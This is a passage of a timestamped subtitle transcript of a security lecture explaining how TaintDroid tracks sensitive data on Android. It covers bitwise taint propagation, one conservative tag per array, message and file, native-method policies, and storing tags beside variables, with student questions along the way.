388 00:18:16,800 --> 00:18:19,930 And the intuition behind that is that to generate 389 00:18:19,930 --> 00:18:23,000 this character, we somehow had to know something 390 00:18:23,000 --> 00:18:24,320 about this array here. 391 00:18:24,320 --> 00:18:26,702 We had to know something about this index here. 392 00:18:26,702 --> 00:18:28,160 So therefore I guess it makes sense 393 00:18:28,160 --> 00:18:30,789 that this thing should be as sensitive as both 394 00:18:30,789 --> 00:18:31,830 of these things combined. 395 00:18:35,580 --> 00:18:38,220 AUDIENCE: Can you explain again move op and binary 396 00:18:38,220 --> 00:18:40,860 op, what exactly it means, like the union of a taint? 397 00:18:40,860 --> 00:18:48,320 PROFESSOR: Yes, so imagine that-- let's look 398 00:18:48,320 --> 00:18:49,800 at the move op here. 399 00:18:49,800 --> 00:18:53,030 So imagine that this source operand here just 400 00:18:53,030 --> 00:18:56,050 had-- actually, let me get more concrete. 401 00:18:56,050 --> 00:18:57,760 So each variable, as I'll describe 402 00:18:57,760 --> 00:19:00,610 in a second what a variable is, has this integer, essentially, 403 00:19:00,610 --> 00:19:02,460 that has a bunch of bits that are set 404 00:19:02,460 --> 00:19:04,550 according to what taint it has. 405 00:19:04,550 --> 00:19:06,760 So imagine each one of these values flying around 406 00:19:06,760 --> 00:19:08,270 has this associated integer flying 407 00:19:08,270 --> 00:19:09,740 around that has some bits set. 408 00:19:09,740 --> 00:19:14,415 So let's say that this source had two bits set, corresponding 409 00:19:14,415 --> 00:19:16,540 to the fact that it had been tainted by two things, 410 00:19:16,540 --> 00:19:17,510 it doesn't really matter. 411 00:19:17,510 --> 00:19:20,093 So what the interpreter will do is it will look at this source 412 00:19:20,093 --> 00:19:22,560 thing, it'll look at the associated integer, 413 00:19:22,560 --> 00:19:24,550 and it'll say aha.
414 00:19:24,550 --> 00:19:27,410 I should take that integer that has those two bits set 415 00:19:27,410 --> 00:19:33,775 and then essentially make that integer the taint tag for this. 416 00:19:33,775 --> 00:19:35,400 So that's sort of a simple case, right. 417 00:19:35,400 --> 00:19:37,160 The more complicated case is, what does the union 418 00:19:37,160 --> 00:19:38,060 actually look like? 419 00:19:38,060 --> 00:19:44,480 So imagine that we've got these two things here 420 00:19:44,480 --> 00:19:48,524 and we've got source 0, source 1. 421 00:19:48,524 --> 00:19:49,940 And so I'm going to show you here, 422 00:19:49,940 --> 00:19:53,719 these are the tainted bits for this particular-- 423 00:19:53,719 --> 00:19:54,635 AUDIENCE: [INAUDIBLE]? 424 00:19:54,635 --> 00:19:58,819 PROFESSOR: Yeah, so imagine that 425 00:19:58,819 --> 00:20:00,110 this is the taint for this one. 426 00:20:00,110 --> 00:20:03,650 And imagine that the taint for this one is this. 427 00:20:03,650 --> 00:20:07,030 So what's the taint going to look like for dest? 428 00:20:07,030 --> 00:20:10,320 You basically take all of the bits that 429 00:20:10,320 --> 00:20:12,970 are set in either one of those and then assign that 430 00:20:12,970 --> 00:20:15,444 to the taint tag for this one. 431 00:20:15,444 --> 00:20:16,610 AUDIENCE: All right, thanks. 432 00:20:16,610 --> 00:20:17,776 PROFESSOR: Yeah, no problem. 433 00:20:17,776 --> 00:20:20,940 And so, once again, I should emphasize this, 434 00:20:20,940 --> 00:20:24,390 so since we can represent all the possible taints in these 32 435 00:20:24,390 --> 00:20:26,590 bits, as we were just discussing, 436 00:20:26,590 --> 00:20:28,999 doing this operation here, it's just bitwise operations. 437 00:20:28,999 --> 00:20:31,040 So this actually really cuts down on the overhead 438 00:20:31,040 --> 00:20:32,500 from implementing these taint bits.
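The move and binary-op rules just walked through can be sketched with a small register-to-tag map. The register names (`v0` to `v3`) and the bit patterns are made up for illustration; the board example's actual bits are not recoverable from the transcript.

```python
# Hypothetical illustration of the two propagation rules. Register names and
# bit patterns are made up; only the rules themselves come from the lecture.

def propagate_move(taints: dict, dest: str, src: str) -> None:
    """move dest, src: the destination takes the source's tag unchanged."""
    taints[dest] = taints[src]

def propagate_binary(taints: dict, dest: str, src0: str, src1: str) -> None:
    """binary-op dest, src0, src1: the destination gets the union of both tags.

    With tags stored as integers, set union is a single bitwise OR.
    """
    taints[dest] = taints[src0] | taints[src1]

# Taint tags for a few virtual registers (shown as 4 bits for readability).
taints = {"v0": 0b0000, "v1": 0b0101, "v2": 0b0011}

propagate_move(taints, "v0", "v1")          # v0 now carries v1's two bits
propagate_binary(taints, "v3", "v1", "v2")  # v3 = 0b0101 | 0b0011
```

Every bit that is set in either source ends up set in the destination, so `v3` carries three bits here: the two from `v1` plus the one bit of `v2` that `v1` did not already have.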
439 00:20:32,500 --> 00:20:35,160 If you had to express a larger universe of taints then 440 00:20:35,160 --> 00:20:37,076 you might be in trouble, because you might not 441 00:20:37,076 --> 00:20:39,070 be able to use these very efficient bitwise 442 00:20:39,070 --> 00:20:41,440 operations to do things. 443 00:20:41,440 --> 00:20:44,051 Any other questions about that? 444 00:20:44,051 --> 00:20:44,550 OK. 445 00:20:47,270 --> 00:20:50,212 So the way that arrays work is a little bit like that binary op 446 00:20:50,212 --> 00:20:50,920 like I mentioned. 447 00:20:50,920 --> 00:20:53,010 So this is going to get the union 448 00:20:53,010 --> 00:20:56,290 of the taint of this and that. 449 00:20:56,290 --> 00:20:59,950 And so one design decision that they made in TaintDroid 450 00:20:59,950 --> 00:21:07,741 is that they associate a single taint tag with each array. 451 00:21:07,741 --> 00:21:09,240 So in other words, they're not going 452 00:21:09,240 --> 00:21:13,492 to try to taint all the individual elements in there. 453 00:21:13,492 --> 00:21:14,950 So basically what's going to end up 454 00:21:14,950 --> 00:21:19,660 happening is that this is going to save them storage space, 455 00:21:19,660 --> 00:21:21,452 right, because for each array they declare, 456 00:21:21,452 --> 00:21:23,118 they'll just have a single 32-bit 457 00:21:23,118 --> 00:21:25,250 entity that sort of floats around that array 458 00:21:25,250 --> 00:21:28,550 and represents all the taint that belongs to that array. 459 00:21:32,270 --> 00:21:34,170 There is one question about why is 460 00:21:34,170 --> 00:21:40,010 it safe to not have a finer-grained system for taint. 461 00:21:40,010 --> 00:21:43,110 Because it seems like an array is a collection of data, 462 00:21:43,110 --> 00:21:45,680 so why shouldn't we have a bunch of labels flying around 463 00:21:45,680 --> 00:21:48,010 for each thing that's in that array?
464 00:21:48,010 --> 00:21:51,190 And so the answer to that is that by only 465 00:21:51,190 --> 00:21:53,380 associating one taint tag with the array 466 00:21:53,380 --> 00:21:56,910 and making it the union of all the things that are inside, 467 00:21:56,910 --> 00:22:00,500 that actually is going to overestimate taint. 468 00:22:00,500 --> 00:22:02,590 So in other words, if you have an array that 469 00:22:02,590 --> 00:22:04,580 has two items in it, and that array 470 00:22:04,580 --> 00:22:06,640 is tainted with the union of all of those things, 471 00:22:06,640 --> 00:22:09,930 well, that's probably a little bit-- it's conservative. 472 00:22:09,930 --> 00:22:12,270 Because it may be that if something only accesses this, 473 00:22:12,270 --> 00:22:14,186 maybe it didn't learn anything about the taint 474 00:22:14,186 --> 00:22:15,070 that was over here. 475 00:22:15,070 --> 00:22:17,720 But by being conservative, hopefully we 476 00:22:17,720 --> 00:22:19,607 will always be correct. 477 00:22:19,607 --> 00:22:21,065 In other words, if we underestimate 478 00:22:21,065 --> 00:22:22,620 the amount of taint that something had, 479 00:22:22,620 --> 00:22:24,540 then we might accidentally disclose something 480 00:22:24,540 --> 00:22:26,248 that we didn't want to actually disclose. 481 00:22:26,248 --> 00:22:28,570 But if we overestimate, then in the worst case, 482 00:22:28,570 --> 00:22:31,700 maybe we prevent something from going outside of the phone that 483 00:22:31,700 --> 00:22:33,380 should actually be OK, but we're going 484 00:22:33,380 --> 00:22:35,027 to err on the side of safety. 485 00:22:35,027 --> 00:22:36,110 Does that all make sense? 486 00:22:38,790 --> 00:22:43,910 Another instance of-- a sort of special case taint 487 00:22:43,910 --> 00:22:49,825 propagation that they mention are things like native methods.
488 00:22:54,120 --> 00:22:57,570 And so native methods might exist inside of the VM 489 00:22:57,570 --> 00:23:02,360 itself, so for example, the Dalvik VM exposes some function 490 00:23:02,360 --> 00:23:08,120 like a System.arraycopy(), so we can pass in anything through 491 00:23:08,120 --> 00:23:13,270 this, and internal to the VM, this is implemented in C or C++ 492 00:23:13,270 --> 00:23:15,750 code for reasons of speed. 493 00:23:15,750 --> 00:23:18,510 That's one type of example of a native method you might have. 494 00:23:18,510 --> 00:23:22,950 Another thing you might have, a type of native method 495 00:23:22,950 --> 00:23:28,800 is what they call JNI-exposed methods. 496 00:23:28,800 --> 00:23:31,310 So the Java Native Interface essentially 497 00:23:31,310 --> 00:23:35,330 allows Java code to call into code 498 00:23:35,330 --> 00:23:38,492 that is not Java, that's implemented using x86 or ARM 499 00:23:38,492 --> 00:23:39,450 or something like that. 500 00:23:39,450 --> 00:23:41,350 There's a whole calling convention 501 00:23:41,350 --> 00:23:43,600 that's exposed here to allow those two types of stacks 502 00:23:43,600 --> 00:23:45,330 to interoperate. 503 00:23:45,330 --> 00:23:49,460 And so the problem with these native code methods, 504 00:23:49,460 --> 00:23:52,370 from the perspective of tracking taint, 505 00:23:52,370 --> 00:23:57,440 is that this native code is not being executed directly 506 00:23:57,440 --> 00:23:59,540 by the Dalvik interpreter. 507 00:23:59,540 --> 00:24:03,400 In fact, it is often not even Java code; it may be C or C++ code. 508 00:24:03,400 --> 00:24:06,300 So that means that once execution flow goes 509 00:24:06,300 --> 00:24:09,020 into one of these native methods, 510 00:24:09,020 --> 00:24:12,690 TaintDroid can't do any of this taint propagation 511 00:24:12,690 --> 00:24:17,010 that it's doing for code that lives in the Java world.
512 00:24:17,010 --> 00:24:18,930 So that seems a little bit problematic 513 00:24:18,930 --> 00:24:21,630 because these things are kind of like black boxes. 514 00:24:21,630 --> 00:24:25,360 You want to make sure that when these methods return, 515 00:24:25,360 --> 00:24:28,640 we can actually somehow represent 516 00:24:28,640 --> 00:24:30,720 the new taint that was created by the execution 517 00:24:30,720 --> 00:24:31,690 of those methods. 518 00:24:31,690 --> 00:24:38,490 And so the way that the authors solve this issue is, 519 00:24:38,490 --> 00:24:42,980 they essentially resort to manual analysis. 520 00:24:46,160 --> 00:24:49,890 So they basically say, there are not a whole lot 521 00:24:49,890 --> 00:24:51,890 of these types of methods here. 522 00:24:51,890 --> 00:24:55,430 So for example, the Dalvik VM only exposes a certain number 523 00:24:55,430 --> 00:24:57,290 of functions like System.arraycopy(), 524 00:24:57,290 --> 00:25:00,080 so we as human developers can look through this relatively 525 00:25:00,080 --> 00:25:03,860 small number of calls and essentially figure out what 526 00:25:03,860 --> 00:25:05,560 the taint relationship should be. 527 00:25:05,560 --> 00:25:08,424 So for example, they can look at something like arraycopy 528 00:25:08,424 --> 00:25:09,840 and say, OK, based on what we know 529 00:25:09,840 --> 00:25:11,840 the semantics of this operation are, 530 00:25:11,840 --> 00:25:13,950 we know that we should taint the return values 531 00:25:13,950 --> 00:25:15,960 from this function in a certain way 532 00:25:15,960 --> 00:25:19,660 given the input values to this function. 533 00:25:19,660 --> 00:25:22,700 And so how well does this scale? 534 00:25:22,700 --> 00:25:25,690 Well, if there are in fact only a small number 535 00:25:25,690 --> 00:25:30,300 of things exposed by, for example, the VM in native code, 536 00:25:30,300 --> 00:25:31,960 this actually works OK.
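A hand-written taint rule for a native call such as System.arraycopy() might look roughly like the sketch below. The wrapper class, the TaggedBytes type, and the rule itself are assumptions made for illustration; the lecture only says that a person reads the semantics of each native method and decides how taint should spread. Here the assumed rule is that the destination array's single tag absorbs the source array's tag once the native copy returns.

```java
// Illustrative sketch only; TaggedBytes and arraycopyWithTaint are hypothetical names.
final class NativePolicySketch {
    // Stand-in for an array together with its single taint tag.
    static final class TaggedBytes {
        final byte[] data;
        int tag;

        TaggedBytes(byte[] data, int tag) {
            this.data = data;
            this.tag = tag;
        }
    }

    // The interpreter cannot observe the native copy, so a manually chosen rule is
    // applied after it returns: the destination's tag becomes dest | src.
    static void arraycopyWithTaint(TaggedBytes src, int srcPos,
                                   TaggedBytes dest, int destPos, int length) {
        System.arraycopy(src.data, srcPos, dest.data, destPos, length);
        dest.tag |= src.tag;
    }

    public static void main(String[] args) {
        TaggedBytes gps = new TaggedBytes(new byte[] {1, 2, 3}, 0b01);
        TaggedBytes buf = new TaggedBytes(new byte[3], 0b10);
        arraycopyWithTaint(gps, 0, buf, 0, 3);
        System.out.println(Integer.toBinaryString(buf.tag)); // prints 11
    }
}
```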
537 00:25:31,960 --> 00:25:34,410 Because if you assume that the Dalvik VM interface doesn't 538 00:25:34,410 --> 00:25:36,640 change very often, then it's actually not 539 00:25:36,640 --> 00:25:39,300 too burdensome to look at these things, view the documentation, 540 00:25:39,300 --> 00:25:43,350 and figure out how taint's going to spread. 541 00:25:43,350 --> 00:25:46,541 The JNI case may or may not be more troublesome. 542 00:25:46,541 --> 00:25:48,790 They give some empirical data that suggests that a lot 543 00:25:48,790 --> 00:25:51,100 of applications are not, in fact, 544 00:25:51,100 --> 00:25:56,075 including code alongside of them that's actually going 545 00:25:56,075 --> 00:25:58,307 to execute in C or C++. 546 00:25:58,307 --> 00:26:00,140 So they argued that empirically, this is not 547 00:26:00,140 --> 00:26:01,223 going to be a big problem. 548 00:26:01,223 --> 00:26:05,840 They also argue that for certain types of method signatures, 549 00:26:05,840 --> 00:26:09,900 you can actually automate the way in which these taint 550 00:26:09,900 --> 00:26:11,160 calculations are done. 551 00:26:11,160 --> 00:26:14,210 So they say that, for example, if only integers or strings are 552 00:26:14,210 --> 00:26:17,000 passed in to some of these native functions here, then 553 00:26:17,000 --> 00:26:20,150 we can just do the standard thing of tagging the output 554 00:26:20,150 --> 00:26:23,389 value with the union of the taints of all the inputs. 555 00:26:23,389 --> 00:26:25,430 So in practice, it seems like this isn't probably 556 00:26:25,430 --> 00:26:27,315 going to be too big of a problem here. 557 00:26:27,315 --> 00:26:30,780 AUDIENCE: But why couldn't you just scan-- whatever 558 00:26:30,780 --> 00:26:33,750 scans your code [INAUDIBLE]? 559 00:26:36,720 --> 00:26:39,610 PROFESSOR: Oh yeah, so in practice, what do they do.
560 00:26:39,610 --> 00:26:43,610 So they know that whenever the interpreter is going to execute 561 00:26:43,610 --> 00:26:46,410 something like this, then when the return value comes back, 562 00:26:46,410 --> 00:26:49,130 they do have special case code that's going to automagically 563 00:26:49,130 --> 00:26:52,750 say return values of System.arraycopy() should have 564 00:26:52,750 --> 00:26:54,149 this taint assigned to it. 565 00:26:54,149 --> 00:26:56,190 AUDIENCE: Right, so what's the manual part of it? 566 00:26:56,190 --> 00:26:57,545 PROFESSOR: Oh, the manual part of it 567 00:26:57,545 --> 00:27:00,260 is figuring out what that policy should be in the first place. 568 00:27:00,260 --> 00:27:03,450 So in other words, if you just look at off the shelf 569 00:27:03,450 --> 00:27:05,255 Taint or off the shelf Android, this 570 00:27:05,255 --> 00:27:06,630 is going to do something for you, 571 00:27:06,630 --> 00:27:08,380 but it's not going to automatically assign 572 00:27:08,380 --> 00:27:09,630 Taint in the right way. 573 00:27:09,630 --> 00:27:11,130 So someone looks at this and figures 574 00:27:11,130 --> 00:27:12,990 out what that policy is. 575 00:27:12,990 --> 00:27:13,490 Make sense? 576 00:27:13,490 --> 00:27:15,584 Any other questions? 577 00:27:15,584 --> 00:27:17,000 It doesn't look like this is going 578 00:27:17,000 --> 00:27:23,210 to be a big problem in practice, although you can imagine that, 579 00:27:23,210 --> 00:27:26,120 for example, if there was this increasing 580 00:27:26,120 --> 00:27:29,280 amount of applications that define these native outcalls, 581 00:27:29,280 --> 00:27:32,841 then we could be in a little bit of a problem. 582 00:27:32,841 --> 00:27:33,340 All right. 583 00:27:38,790 --> 00:27:42,780 So another type of data that we have 584 00:27:42,780 --> 00:27:49,290 to worry about assigning taint to, IPC messages. 
585 00:27:49,290 --> 00:27:53,257 And so IPC messages are essentially 586 00:27:53,257 --> 00:27:54,090 treated like arrays. 587 00:27:56,610 --> 00:28:01,790 So each one of these messages is going 588 00:28:01,790 --> 00:28:04,310 to be associated with a single taint that 589 00:28:04,310 --> 00:28:08,230 is the union of the taint of all the constituent parts. 590 00:28:08,230 --> 00:28:09,900 Once again, this helps with efficiency 591 00:28:09,900 --> 00:28:13,140 because we only have to store one taint tag 592 00:28:13,140 --> 00:28:15,360 for each one of these messages. 593 00:28:15,360 --> 00:28:17,860 And in the worst case, this is conservative, 594 00:28:17,860 --> 00:28:19,170 it overestimates taint. 595 00:28:19,170 --> 00:28:21,727 But that should never result in a security leak. 596 00:28:21,727 --> 00:28:23,560 At worst, it should only result in something 597 00:28:23,560 --> 00:28:25,650 that should have been able to go over the network not being 598 00:28:25,650 --> 00:28:27,030 able to go over the network. 599 00:28:30,110 --> 00:28:32,730 This is how things work when you're constructing 600 00:28:32,730 --> 00:28:34,800 the message, so that message gets 601 00:28:34,800 --> 00:28:36,880 the union of all the taint of its components. 602 00:28:36,880 --> 00:28:40,570 Then when you're reading it, what you 603 00:28:40,570 --> 00:28:46,500 receive in the message-- so extracted data 604 00:28:46,500 --> 00:28:52,560 gets the taint of the message itself, which makes sense. 605 00:28:55,240 --> 00:28:57,200 So that's how IPC messages are treated. 606 00:28:57,200 --> 00:29:03,000 Another resource you might worry about is how files are handled. 607 00:29:03,000 --> 00:29:10,160 So once again each file gets a single taint tag, 608 00:29:10,160 --> 00:29:11,770 and that tag is essentially stored 609 00:29:11,770 --> 00:29:14,970 alongside the file in its metadata on stable storage 610 00:29:14,970 --> 00:29:17,219 like the SD card or whatever.
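The message-level rule described above (one tag per IPC message, merged on write and handed back on read) can be sketched as follows. The Message and Tagged types are hypothetical stand-ins invented for this illustration, not Android's Parcel or Binder classes, and the GPS bit value is an assumption.

```java
import java.util.ArrayList;
import java.util.List;

// Illustrative sketch only; Message and Tagged are hypothetical, not Android IPC classes.
final class MessageTaintSketch {
    static final int TAINT_GPS = 1 << 0; // assumed bit assignment

    // A value paired with its taint tag.
    static final class Tagged {
        final String value;
        final int tag;

        Tagged(String value, int tag) {
            this.value = value;
            this.tag = tag;
        }
    }

    // A message keeps one tag for all of its parts.
    static final class Message {
        private final List<String> parts = new ArrayList<>();
        private int tag = 0;

        // Writing a part merges that part's tag into the message's single tag.
        void write(Tagged part) {
            parts.add(part.value);
            tag |= part.tag;
        }

        // Anything read back carries the whole message's tag, which may overestimate.
        Tagged read(int index) {
            return new Tagged(parts.get(index), tag);
        }
    }

    public static void main(String[] args) {
        Message msg = new Message();
        msg.write(new Tagged("hello", 0));
        msg.write(new Tagged("42.36,-71.09", TAINT_GPS));
        // "hello" was untainted when written, but it now reads back with the GPS bit.
        System.out.println(msg.read(0).value + " tag=" + msg.read(0).tag); // prints hello tag=1
    }
}
```

The untainted string picking up the GPS bit is exactly the conservative overestimate the per-message design accepts in exchange for storing one tag.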
611 00:29:17,219 --> 00:29:19,260 So this is basically the same conservative scheme 612 00:29:19,260 --> 00:29:20,360 that we've seen before. 613 00:29:20,360 --> 00:29:25,030 So the basic idea is that the application accesses 614 00:29:25,030 --> 00:29:27,090 some sensitive data like, for example, your GPS 615 00:29:27,090 --> 00:29:31,710 location, maybe it's going to write that data to a file. 616 00:29:31,710 --> 00:29:34,730 So TaintDroid updates that file's taint tag 617 00:29:34,730 --> 00:29:38,700 with the GPS flag, maybe the application closes down, 618 00:29:38,700 --> 00:29:42,940 later on some other application comes out, it reads that file. 619 00:29:42,940 --> 00:29:46,700 When it comes into the VM, into the application, 620 00:29:46,700 --> 00:29:48,200 TaintDroid will look and see that it 621 00:29:48,200 --> 00:29:52,150 has that flag marked, and so any data that's 622 00:29:52,150 --> 00:29:55,550 derived from reading that file will also have that GPS flag 623 00:29:55,550 --> 00:29:56,240 set. 624 00:29:56,240 --> 00:29:59,590 So pretty straightforward, I think. 625 00:29:59,590 --> 00:30:04,410 So what kind of things do we have 626 00:30:04,410 --> 00:30:07,170 to taint in terms of Java State. 627 00:30:07,170 --> 00:30:15,990 So there's basically five types of Java objects 628 00:30:15,990 --> 00:30:19,570 that need taint flags. 629 00:30:23,190 --> 00:30:31,330 And so the first kind of thing is local variables 630 00:30:31,330 --> 00:30:34,370 that live in a method. 631 00:30:34,370 --> 00:30:37,430 So we can imagine back over here, 632 00:30:37,430 --> 00:30:40,110 this is a local variable, char c, for example. 633 00:30:40,110 --> 00:30:44,560 So we have to assign taint flags to those things. 634 00:30:44,560 --> 00:30:50,560 You can also imagine that method arguments 635 00:30:50,560 --> 00:30:52,440 need to have taint flags. 636 00:30:52,440 --> 00:30:59,030 Both of these things here, these live in a stack. 
637 00:31:03,280 --> 00:31:06,090 So TaintDroid has to keep track of assigning flags 638 00:31:06,090 --> 00:31:08,070 and whatnot for those types of things. 639 00:31:08,070 --> 00:31:15,460 Also we need to assign flags to object instance fields. 640 00:31:19,980 --> 00:31:24,670 And so this is like, imagine that I have some object called 641 00:31:24,670 --> 00:31:28,166 c, it's a circle so of course the proper thing to do 642 00:31:28,166 --> 00:31:29,730 is I want to look at its radius. 643 00:31:29,730 --> 00:31:31,520 Here's a field here. 644 00:31:31,520 --> 00:31:36,690 And so we have to associate taint information for each one 645 00:31:36,690 --> 00:31:39,030 of these fields here. 646 00:31:39,030 --> 00:31:46,660 Java also allows you to have a static class field, 647 00:31:46,660 --> 00:31:50,300 and so you need taint information for those. 648 00:31:50,300 --> 00:31:56,030 This is saying something like, for example, maybe the circle class 649 00:31:56,030 --> 00:31:59,200 has some static property; OK, we'll assign some taint 650 00:31:59,200 --> 00:32:00,530 information there. 651 00:32:00,530 --> 00:32:04,080 Then arrays, as we've already discussed before, 652 00:32:04,080 --> 00:32:07,750 we'll assign one piece of taint information 653 00:32:07,750 --> 00:32:09,350 for that entire array. 654 00:32:09,350 --> 00:32:12,030 And so the basic idea for how we're 655 00:32:12,030 --> 00:32:15,450 going to store these taint flags at the implementation level, 656 00:32:15,450 --> 00:32:21,887 is that we're going to try to basically store the taint 657 00:32:21,887 --> 00:32:27,560 flags for a variable near the variable itself. 658 00:32:33,620 --> 00:32:38,170 The basic idea here is we've got, for example, 659 00:32:38,170 --> 00:32:40,070 let's say some integer variable, and we 660 00:32:40,070 --> 00:32:42,740 want to store some taint state with that.
661 00:32:42,740 --> 00:32:45,430 We want to try to keep that state as close to the variable 662 00:32:45,430 --> 00:32:47,660 as possible for reasons of making the cache 663 00:32:47,660 --> 00:32:50,420 work efficiently at the processor level. 664 00:32:50,420 --> 00:32:52,790 So if we were to store taint very far 665 00:32:52,790 --> 00:32:54,376 away from that variable, that can 666 00:32:54,376 --> 00:32:56,640 be problematic because probably, the interpreter 667 00:32:56,640 --> 00:32:59,250 is going to look at the memory value for the actual Java 668 00:32:59,250 --> 00:32:59,860 variable. 669 00:32:59,860 --> 00:33:02,310 It's going to want to very quickly thereafter, or even 670 00:33:02,310 --> 00:33:04,990 before that, look and see what the taint information is. 671 00:33:04,990 --> 00:33:09,566 Because if you look at these operations here, 672 00:33:09,566 --> 00:33:10,940 the same places in the code where 673 00:33:10,940 --> 00:33:12,280 the interpreter's looking at the values, 674 00:33:12,280 --> 00:33:13,710 it's also looking at taint. 675 00:33:13,710 --> 00:33:17,710 Basically by storing these things close to each other, 676 00:33:17,710 --> 00:33:19,880 you try to make the cache behavior better. 677 00:33:19,880 --> 00:33:22,840 And the way that they do this is actually 678 00:33:22,840 --> 00:33:25,520 pretty straightforward. 679 00:33:25,520 --> 00:33:30,660 So if you look at what they do for method arguments 680 00:33:30,660 --> 00:33:32,500 and local variables that live on a stack, 681 00:33:32,500 --> 00:33:36,390 they essentially allocate the taint flags 682 00:33:36,390 --> 00:33:39,330 right next to where the variables are allocated. 683 00:33:39,330 --> 00:33:44,860 So let's say that we have our favorite thing in this class, 684 00:33:44,860 --> 00:33:47,360 a stack diagram, which you'll probably 685 00:33:47,360 --> 00:33:49,110 hate after you get out of here. 
686 00:33:49,110 --> 00:33:56,740 So you've got some local variable 0 on the stack, 687 00:33:56,740 --> 00:33:59,220 and then what TaintDroid will do is 688 00:33:59,220 --> 00:34:02,270 it will store the taint tag for that variable 689 00:34:02,270 --> 00:34:05,540 right next to where that local variable is in memory. 690 00:34:05,540 --> 00:34:10,810 So similarly, if you had another local variable here, 691 00:34:10,810 --> 00:34:16,900 then you would see its taint tag right down here. 692 00:34:16,900 --> 00:34:19,362 So on and so forth. 693 00:34:19,362 --> 00:34:20,320 Pretty straightforward. 694 00:34:20,320 --> 00:34:22,567 So hopefully you get these things 695 00:34:22,567 --> 00:34:25,150 in the same cache line, that's going to make the accesses very 696 00:34:25,150 --> 00:34:25,671 cheap. 697 00:34:25,671 --> 00:34:26,170 Yeah? 698 00:34:26,170 --> 00:34:28,094 AUDIENCE: I was just wondering, how can you 699 00:34:28,094 --> 00:34:30,350 have a single flag for an entire array 700 00:34:30,350 --> 00:34:33,810 and a different flag for every property of an object. 701 00:34:33,810 --> 00:34:38,080 What if one of the methods of the object 702 00:34:38,080 --> 00:34:41,023 can access data which is stored in its properties. 703 00:34:41,023 --> 00:34:42,895 That would like-- know what I mean? 704 00:34:42,895 --> 00:34:44,190 PROFESSOR: Let's see. 705 00:34:44,190 --> 00:34:47,030 So you're asking as a policy reason, why? 706 00:34:47,030 --> 00:34:48,530 AUDIENCE: As a policy reason, right. 707 00:34:48,530 --> 00:34:51,840 PROFESSOR: So I think some of this they do for implementation 708 00:34:51,840 --> 00:34:53,489 efficiency reasons. 709 00:34:53,489 --> 00:34:56,530 I think that for the case-- so they have some other rules, 710 00:34:56,530 --> 00:34:57,030 too. 
711 00:34:57,030 --> 00:35:00,232 For example, they say that the length of an 712 00:35:00,232 --> 00:35:02,750 array isn't actually going to leak information, 713 00:35:02,750 --> 00:35:04,700 so they don't propagate taint for that. 714 00:35:04,700 --> 00:35:07,000 So some of it is just for reasons of efficiency. 715 00:35:07,000 --> 00:35:09,820 I think that in principle, there's nothing that stops you 716 00:35:09,820 --> 00:35:14,450 from saying, take every element in the array 717 00:35:14,450 --> 00:35:16,636 and, when you do some particular access on it, 718 00:35:16,636 --> 00:35:18,760 then you just say the thing on the left hand side's 719 00:35:18,760 --> 00:35:21,741 going to get the taint of only that item. 720 00:35:21,741 --> 00:35:23,740 It's not completely clear that's the right thing 721 00:35:23,740 --> 00:35:25,910 to do, though, because presumably 722 00:35:25,910 --> 00:35:28,980 in getting that thing into the array in the first place, 723 00:35:28,980 --> 00:35:30,930 the thing that did that had to know something 724 00:35:30,930 --> 00:35:32,851 about the array in some way. 725 00:35:32,851 --> 00:35:35,100 So I think it's a combination of both policy reasons-- 726 00:35:35,100 --> 00:35:38,060 they think that by being overly conservative, 727 00:35:38,060 --> 00:35:42,200 you shouldn't allow any data leaks that you want to prevent. 728 00:35:42,200 --> 00:35:44,740 And also I think that it kind of does intuitively 729 00:35:44,740 --> 00:35:47,035 make sense that accessing an array, 730 00:35:47,035 --> 00:35:49,160 you should have to know something about that array. 731 00:35:49,160 --> 00:35:50,740 And when you have to know something about something, 732 00:35:50,740 --> 00:35:52,948 that typically means that you get tainted by it. 733 00:35:54,810 --> 00:35:57,210 Any other questions?
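The per-array policy discussed in this exchange can be sketched as below, as an illustration rather than the actual implementation. The TaintedCharArray class and its method names are hypothetical. The sketch follows the lecture's description: a store merges the value's tag into the array's single tag, a load yields the union of the array's tag and the index's tag, and the length is treated as untainted.

```java
// Illustrative sketch only; TaintedCharArray and its methods are hypothetical names.
final class ArrayTaintSketch {
    static final class TaintedCharArray {
        final char[] data;
        int tag = 0; // one tag covers every element

        TaintedCharArray(int size) {
            data = new char[size];
        }

        // Store: the array's single tag absorbs the stored value's tag.
        void put(int index, char value, int valueTag) {
            data[index] = value;
            tag |= valueTag;
        }

        // Load: the result is as sensitive as the array and the index combined.
        int tagOfGet(int indexTag) {
            return tag | indexTag;
        }

        // Length: treated as untainted, following the lecture's description.
        int tagOfLength() {
            return 0;
        }
    }

    public static void main(String[] args) {
        TaintedCharArray arr = new TaintedCharArray(2);
        arr.put(0, 'a', 0);     // untainted element
        arr.put(1, 'b', 0b100); // tainted element
        System.out.println(Integer.toBinaryString(arr.tagOfGet(0b001))); // prints 101
        System.out.println(arr.tagOfLength());                           // prints 0
    }
}
```

Reading the untainted element at index 0 still returns the array-wide tag, which is the overestimate that keeps the scheme safe.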
734 00:35:57,210 --> 00:35:59,425 OK, so this is the basic scheme that they 735 00:35:59,425 --> 00:36:02,830 use for essentially storing all of this information close 736 00:36:02,830 --> 00:36:03,500 to each other. 737 00:36:03,500 --> 00:36:05,300 So you can imagine that for class fields 738 00:36:05,300 --> 00:36:07,440 and for object fields, you do a similar thing. 739 00:36:07,440 --> 00:36:09,280 So in the declaration of the class, 740 00:36:09,280 --> 00:36:12,580 you've got some slot memory for a particular instance variable, 741 00:36:12,580 --> 00:36:14,530 and then right next to that slot you 742 00:36:14,530 --> 00:36:18,660 have the taint information for that particular variable. 743 00:36:18,660 --> 00:36:21,380 So I think that's all pretty reasonable. 744 00:36:22,860 --> 00:36:26,780 That's kind of a high level overview of how TaintDroid 745 00:36:26,780 --> 00:36:30,990 works, so if you get all this, then the basic idea 746 00:36:30,990 --> 00:36:33,900 behind TaintDroid is actually pretty simple. 747 00:36:33,900 --> 00:36:37,900 So at system initialization time or whatever, 748 00:36:37,900 --> 00:36:41,660 TaintDroid looks at all these sources of potentially tainted 749 00:36:41,660 --> 00:36:43,880 information, and essentially assigns a flag 750 00:36:43,880 --> 00:36:45,046 to each one of these things. 751 00:36:45,046 --> 00:36:47,940 So things like your GPS, your camera, and so on and so forth. 
